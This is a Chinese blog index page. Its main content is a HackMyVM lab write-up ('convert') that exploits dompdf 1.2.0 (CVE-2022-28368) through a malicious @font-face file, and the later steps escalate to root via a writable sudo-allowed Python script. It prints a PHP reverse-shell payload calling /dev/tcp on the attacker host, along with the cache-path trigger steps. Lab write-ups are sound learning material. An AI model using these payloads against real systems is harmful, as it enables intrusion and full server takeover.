<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


  <meta name="description" content="把生命浪费在美好的实物上">
<meta property="og:type" content="website">
<meta property="og:title" content="去找Todd">
<meta property="og:url" content="https://ghostlitao.gitee.io/index.html">
<meta property="og:site_name" content="去找Todd">
<meta property="og:description" content="把生命浪费在美好的实物上">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="Todd">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ghostlitao.gitee.io/">



  <title>去找Todd</title>
  







</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>


    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content index posts-expand">
            
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/19/hmv-supra/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/19/hmv-supra/" class="post-title-link" itemprop="url">HMV Supra</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-04-19 08:40:57" itemprop="dateCreated datePublished" datetime="2024-04-19T08:40:57+08:00">2024-04-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-23 08:42:35" itemprop="dateModified" datetime="2024-04-23T08:42:35+08:00">2024-04-23</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p><a target="_blank" rel="noopener" href="https://hackmyvm.eu/machines/machine.php?vm=Supra">https://hackmyvm.eu/machines/machine.php?vm=Supra</a></p>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="NAMP-扫描"><a href="#NAMP-扫描" class="headerlink" title="NAMP 扫描"></a>NAMP 扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">IP=192.168.0.197</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nmap -sV -T5 -Pn -p-  <span class="variable">$IP</span></span><br><span class="line"><span class="comment"># -sV Probe open ports to determine service/version info , # 识别服务/版本</span></span><br><span class="line"><span class="comment"># -T5 Set timing template (higher is faster) # 5是最快的了</span></span><br><span class="line"><span class="comment"># -Pn Treat all hosts as online -- skip host discovery # 不进行主机发现</span></span><br><span class="line"><span class="comment"># -p- Scan all ports # 扫描所有端口</span></span><br><span class="line"></span><br><span class="line">PORT     STATE SERVICE VERSION</span><br><span class="line">22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)</span><br><span class="line">80/tcp   open  http    Apache httpd 2.4.48 ((Debian))</span><br><span class="line">4000/tcp open  http    Node.js (Express middleware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br></pre></td></tr></table></figure>
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/18/hmv-convert/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/18/hmv-convert/" class="post-title-link" itemprop="url">HMV convert 靶机复盘</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-04-18 09:24:02 / 修改时间：13:21:03" itemprop="dateCreated datePublished" datetime="2024-04-18T09:24:02+08:00">2024-04-18</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="NAMP-扫描"><a href="#NAMP-扫描" class="headerlink" title="NAMP 扫描"></a>NAMP 扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">IP=192.168.0.190</span><br><span class="line">nmap -sV -T5 -Pn -p-  <span class="variable">$IP</span></span><br><span class="line"></span><br><span class="line">Host is up (0.022s latency).</span><br><span class="line">Not shown: 64756 closed tcp ports (conn-refused), 777 filtered tcp ports (no-response)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)</span><br><span class="line">80/tcp open  http    nginx 1.22.1</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>只开了 22 和 80，先挂上目录扫描，同时去看网页。（顺带一提，<code>-T5</code> 在不稳定的网络上可能漏端口，结果存疑时用 <code>-T4</code> 重扫一遍。）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gobuster <span class="built_in">dir</span> -u http://<span class="variable">$IP</span> -w /usr/share/wordlists/dirb/common.txt</span><br><span class="line"></span><br><span class="line">/index.php            (Status: 200) [Size: 1026]</span><br><span class="line">/upload               (Status: 301) [Size: 169] [--&gt; http://192.168.0.190/upload/]</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>看一眼首页，是一个 HTML 转 PDF 的转换服务。直接访问 <a target="_blank" rel="noopener" href="http://192.168.0.190/upload/">http://192.168.0.190/upload/</a> 是 403，不清楚是禁止列目录还是需要登录验证。</p>
<h1 id="尝试入侵"><a href="#尝试入侵" class="headerlink" title="尝试入侵"></a>尝试入侵</h1><p>看到是 HTML 转 PDF，先试着提交了 <a target="_blank" rel="noopener" href="http://www.baidu.com">http://www.baidu.com</a>，报错：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Fatal error: Uncaught <span class="built_in">RuntimeException</span>: <span class="built_in">Error</span> generating PDF: The PHP GD extension is required, but is not installed. in /<span class="keyword">var</span>/www/html/index.php:<span class="number">39</span> Stack trace: <span class="comment">#0 /var/www/html/index.php(61): PdfGenerator-&gt;generateFromHtml() #1 &#123;main&#125; thrown in /var/www/html/index.php on line 39</span></span><br></pre></td></tr></table></figure>
<p>百度首页带图片，而服务端没有安装 GD 库，所以渲染失败。不过这条报错本身就是一处信息泄露：display_errors 开着，把绝对路径 /var/www/html/index.php 和调用链 PdfGenerator-&gt;generateFromHtml() 都吐出来了。当时觉得没什么用，其实 Web 根目录的位置在后面定位落地文件时正好用到，这类信息应该先记下来。去 github 上搜一下代码，看看能不能找到来源：<br><code>language:php  path:index.php  PdfGenerator-&gt;generateFromHtml()</code><br>搜不出来，说明这段代码不是某个开源项目里直接拿来的。</p>
<p>再尝试下 <a target="_blank" rel="noopener" href="http://192.168.0.190/">http://192.168.0.190/</a> 发现返回了 pdf 版本的首页。<br>所以这个服务是正常工作的，只是没有 GD 库，不能生成图片。</p>
<p>此时群里的小伙伴提醒在 hacktricks 里面有一个 pdf 相关的知识点，去看了下，发现了一个有趣的东西：</p>
<p><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf">https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf</a></p>
<p>因为转换服务需要读取网页内容，所以可能有两种情况：</p>
<ul>
<li>使用 wkhtmltopdf 之类的渲染器时，页面里的 js 可能会在服务端执行，也就是所谓 server-side XSS。别把它当普通 XSS 看：脚本跑在服务器的渲染进程里，往往可以借 iframe/XHR 读本地文件或访问内网，实际效果接近 SSRF / 本地文件读取，在靶机上同样有用。</li>
<li>还有一种就是 SSRF，如果可以读取本地文件，那么就可以读取敏感文件。甚至可以利用做内网扫描。</li>
</ul>
<p>遗憾的是，试了很多 payload 似乎并没有触发，我基本上确认这个服务并不会执行 js 代码。</p>
<p>这个时候又有一个小伙伴丢出了一个 dompdf exploit。<br>原来是我太菜了，并不是我猜的 wkhtmltopdf。<br>其实我之前已经下载并打开过 pdf 文件了，strings 之后并没有看到这个内容。后来用 sublime 打开才发现漏了一行：Producer 字段是 UTF-16 编码（开头的 þÿ 就是大端 BOM，所以字母之间都隔着一个空字节），默认只找 ASCII 的 <code>strings</code> 会跳过它，要用 <code>strings -eb</code>，或者直接 <code>pdfinfo</code>/<code>exiftool</code> 看元数据。对这类 PDF 转换服务，先确认生成器和版本应该是第一步。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;&lt;</span><br><span class="line">/Producer (þÿ d o m p d f   1 . 2 . 0   +   C P D F)</span><br><span class="line">/CreationDate (D:20240418013744+00&#x27;00&#x27;)</span><br><span class="line">/ModDate (D:20240418013744+00&#x27;00&#x27;)</span><br></pre></td></tr></table></figure>

<p>这样就确定了后端是 dompdf 1.2.0。去 <a target="_blank" rel="noopener" href="https://www.exploit-db.com/">https://www.exploit-db.com/</a> 搜索后发现了 Dompdf 1.2.1 - Remote Code Execution (RCE)，对应 CVE-2022-28368（通过 CSS 的 @font-face 让 dompdf 远程加载一个 .php 文件）。<br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/51270">https://www.exploit-db.com/exploits/51270</a><br>里面有利用脚本：<a target="_blank" rel="noopener" href="https://github.com/rvizx/CVE-2022-28368">https://github.com/rvizx/CVE-2022-28368</a><br>既然有脚本，剩下就是开搞</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/rvizx/CVE-2022-28368</span><br><span class="line"><span class="built_in">cd</span>  CVE-2022-28368</span><br><span class="line">python3 -m pip install -r requirements.txt</span><br><span class="line">python3 dompdf-rce.py --<span class="built_in">help</span></span><br></pre></td></tr></table></figure>

<p>一顿操作下来，傻眼了，并没有成功。仔细看了下利用代码，发现 RCE 利用的时候，dompdf 是直接有一个入口的，而靶场的入口是被目前看到的这个转换服务封装过的。</p>
<p>没办法，这个时候只能弄明白这个脚本是怎么工作的了。<br>又去一顿搜索。发现了一个 github 仓库 <a target="_blank" rel="noopener" href="https://github.com/positive-security/dompdf-rce">https://github.com/positive-security/dompdf-rce</a><br>里面有一个图写的非常清楚这个利用过程：<br><img src="https://github.com/positive-security/dompdf-rce/raw/main/exploit/overview.png" alt="dompdf-rce"></p>
<p>这个时候方案就比较清楚了：刚才的 python 脚本已经帮我生成了 css 和 php 文件，我只需要再写一个 html 引入这个 css，起一个 <code>python3 -m http.server</code> 托管这三个文件，然后让目标去转换这个 html 的地址，就可以触发了。关键在于 exploit_font.php 会被 dompdf 当作字体文件原样缓存到 Web 根目录下，后面就是靠访问这个缓存文件来执行 PHP。</p>
<ol>
<li>先把刚才生成的 css 和 php 文件放到一个目录下，把里面的 IP 和端口改成本机和 http 服务实际监听的值（这里是 192.168.0.30:8000），然后在该目录下起服务：<code>python3 -m http.server 8000</code></li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">┌──(kali㉿kali)-[~/tools/CVE-2022-28368]</span><br><span class="line">└─$ <span class="built_in">cat</span> exploit.css</span><br><span class="line"></span><br><span class="line">@font-face &#123;</span><br><span class="line">    font-family:<span class="string">&#x27;exploitfont&#x27;</span>;</span><br><span class="line">    src:url(<span class="string">&#x27;http://192.168.0.30:8000/exploit_font.php&#x27;</span>);</span><br><span class="line">    font-weight:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">    font-style:<span class="string">&#x27;normal&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">┌──(kali㉿kali)-[~/tools/CVE-2022-28368]</span><br><span class="line">└─$ <span class="built_in">cat</span> exploit_font.php</span><br><span class="line"></span><br><span class="line">� dum1�cmap</span><br><span class="line">           `�,glyf5sc��<span class="built_in">head</span>�Q6�6hhea��(<span class="variable">$hmtxD</span></span><br><span 
class="line">loca</span><br><span class="line">Tmaxp\ nameD�|8dum2�</span><br><span class="line">                     -��-����</span><br><span class="line">:83<span class="comment">#5:08��_&lt;�</span></span><br><span class="line">             @�8�&amp;۽</span><br><span class="line">:8L��</span><br><span class="line"></span><br><span class="line">:D</span><br><span class="line"></span><br><span class="line">6                               s</span><br><span class="line">&lt;?php <span class="built_in">exec</span>(<span class="string">&quot;/bin/bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.0.30/1234 0&gt;&amp;1&#x27;&quot;</span>);?&gt;</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>写一个 index.html，引入刚才的 exploit.css（注意 href 里的文件名和 IP 要和实际托管的一致，否则下一步日志里看不到后续请求）</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">&quot;stylesheet&quot;</span> <span class="attr">type</span>=<span class="string">&quot;text/css&quot;</span> <span class="attr">href</span>=<span class="string">&quot;http://192.168.0.30:8000/exploit.css&quot;</span> /&gt;</span></span><br></pre></td></tr></table></figure>

<ol start="3">
<li>去目标网页上输入这个 html 文件的地址，就可以看见请求：</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ python3 -m http.server 8000</span><br><span class="line">Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...</span><br><span class="line">192.168.0.190 - - [18/Apr/2024 12:56:32] <span class="string">&quot;GET /index.html HTTP/1.1&quot;</span> 200 -</span><br><span class="line">192.168.0.190 - - [18/Apr/2024 12:56:32] <span class="string">&quot;GET /exploit.css HTTP/1.1&quot;</span> 200 -</span><br><span class="line">192.168.0.190 - - [18/Apr/2024 12:56:32] <span class="string">&quot;GET /exploit_font.php HTTP/1.1&quot;</span> 200 -</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>此时恶意的 PHP 文件已经以字体缓存的形式落在靶机上了。缓存文件名的格式是 <code>&lt;font-family&gt;_&lt;font-weight&gt;_&lt;md5(字体 URL)&gt;.php</code>，所以只要算出字体 URL 的 md5，就能在 Web 服务上直接访问触发它。</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 先准备一个反弹监听：</span></span><br><span class="line"></span><br><span class="line">pwncat-cs -l -p 1234</span><br><span class="line"></span><br><span class="line"><span class="comment"># 然后访问 http://192.168.0.30:8000/exploit_font.php 的cmd5 值：</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;http://192.168.0.30:8000/exploit_font.php&#x27;</span> | md5</span><br><span class="line">e47f95cc50e077ca3a5a0187668913a0</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>要访问的路径就是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.0.190/dompdf/lib/fonts/exploitfont_normal_e47f95cc50e077ca3a5a0187668913a0.php</span><br></pre></td></tr></table></figure>

<p>如果没有弹回成功，注意检查以上的各个步骤。几个常见的坑：一是 md5 必须对不带换行的 URL 计算，<code>echo</code> 默认会追加换行符，要用 <code>echo -n</code> 或 <code>printf '%s'</code>（Linux 上是 <code>md5sum</code>），否则算出来的文件名对不上；二是这个 php 文件是在一个二进制字体文件尾部追加了一句 PHP，所以如果你在 vim 下直接编辑，字符集不正确时可能会破坏字体内容，dompdf 也就可能不会把它缓存下来。<br>所以可以选择不改 php 文件里的反弹地址或者端口，或者直接用脚本重新生成一份。</p>
<ol start="5">
<li>然后就拿到了一个反弹 shell，身份是 eva——也就是 Web 服务实际运行的用户，并不是常见的 www-data，所以家目录里直接就能看到 user.txt</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">(remote) eva@convert:/var/www/html/dompdf/lib/fonts$ <span class="built_in">id</span></span><br><span class="line">uid=1000(eva) gid=1000(eva) <span class="built_in">groups</span>=1000(eva)</span><br><span class="line">(remote) eva@convert:/home/eva$ <span class="built_in">ls</span> -al</span><br><span class="line">total 36</span><br><span class="line">drwx------ 2 eva  eva  4096 Apr 16 05:35 .</span><br><span class="line">drwxr-xr-x 3 root root 4096 Feb 22 22:17 ..</span><br><span class="line">lrwxrwxrwx 1 root root    9 Feb 23 17:01 .bash_history -&gt; /dev/null</span><br><span class="line">-rw-r--r-- 1 eva  eva   220 Feb 22 22:17 .bash_logout</span><br><span class="line">-rw-r--r-- 1 eva  eva  3526 Feb 22 22:17 .bashrc</span><br><span class="line">-rw-r--r-- 1 eva  eva   807 Feb 22 22:17 .profile</span><br><span class="line">-rw------- 1 eva  eva  1392 Apr 16 05:35 .viminfo</span><br><span class="line">-rw-r--r-- 1 root root    1 Feb 24 10:10 pdf_gen.log</span><br><span class="line">-rw-r--r-- 1 eva  eva    33 Apr 16 05:35 pdfgen.py</span><br><span class="line">-rw-r----- 1 eva  eva    33 Feb 23 17:16 user.txt</span><br></pre></td></tr></table></figure>

<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p>先 <code>sudo -l </code> 看下结果：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Matching Defaults entries <span class="keyword">for</span> eva on convert:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty</span><br><span class="line"></span><br><span class="line">User eva may run the following commands on convert:</span><br><span class="line">    (ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *</span><br></pre></td></tr></table></figure>

<p>这里关键的部分是可以用 root 身份免密执行 /home/eva/pdfgen.py，而这个路径在 eva 自己的家目录下——sudo 规则指向一个低权限用户能控制的文件，这本身就是错误配置。按上面 <code>ls -al</code> 的结果，pdfgen.py 属于 eva 且可写，其实可以直接改；经大佬指点，即便这个文件属于 root、eva 没有写权限，只要 /home/eva 目录对 eva 可写，照样可以把它删掉再新建一个（能否删除和新建由目录权限决定，而不是文件本身的权限）。于是：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">rm</span> pdfgen.py </span><br></pre></td></tr></table></figure>
<p>然后新建这个文件：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line">os.system(<span class="string">&#x27;/bin/bash&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>在执行这个文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/bin/python3 /home/eva/pdfgen.py 1</span><br><span class="line">root@convert:/home/eva<span class="comment"># id</span></span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root)</span><br></pre></td></tr></table></figure>

<p>就拿到了 root shell，然后就可以看到 &#x2F;root&#x2F;root.txt 了。</p>
<p>完结。</p>

      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/15/hmv-quick/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/15/hmv-quick/" class="post-title-link" itemprop="url">HMV Quick</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-04-15 08:51:13" itemprop="dateCreated datePublished" datetime="2024-04-15T08:51:13+08:00">2024-04-15</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-19 08:44:44" itemprop="dateModified" datetime="2024-04-19T08:44:44+08:00">2024-04-19</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="NAMP-扫描"><a href="#NAMP-扫描" class="headerlink" title="NMAP 扫描"></a>NMAP 扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">IP=192.168.0.189</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nmap -sV -T5 -Pn -p-  <span class="variable">$IP</span></span><br><span class="line"><span class="comment"># -sV Probe open ports to determine service/version info , # 识别服务/版本</span></span><br><span class="line"><span class="comment"># -T5 Set timing template (higher is faster) # 5是最快的了</span></span><br><span class="line"><span class="comment"># -Pn Treat all hosts as online -- skip host discovery # 不进行主机发现</span></span><br><span class="line"><span class="comment"># -p- Scan all ports # 扫描所有端口</span></span><br><span class="line"></span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 09:48 HKT</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.0.189</span><br><span class="line">Host is up (0.020s latency).</span><br><span class="line">Not shown: 65534 closed tcp ports (conn-refused)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 20.18 seconds</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/04/15/hmv-quick/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/04/09/hmv-challenge-72/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/09/hmv-challenge-72/" class="post-title-link" itemprop="url">HMV Challenge 72</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-04-09 08:29:08" itemprop="dateCreated datePublished" datetime="2024-04-09T08:29:08+08:00">2024-04-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-18 13:21:38" itemprop="dateModified" datetime="2024-04-18T13:21:38+08:00">2024-04-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
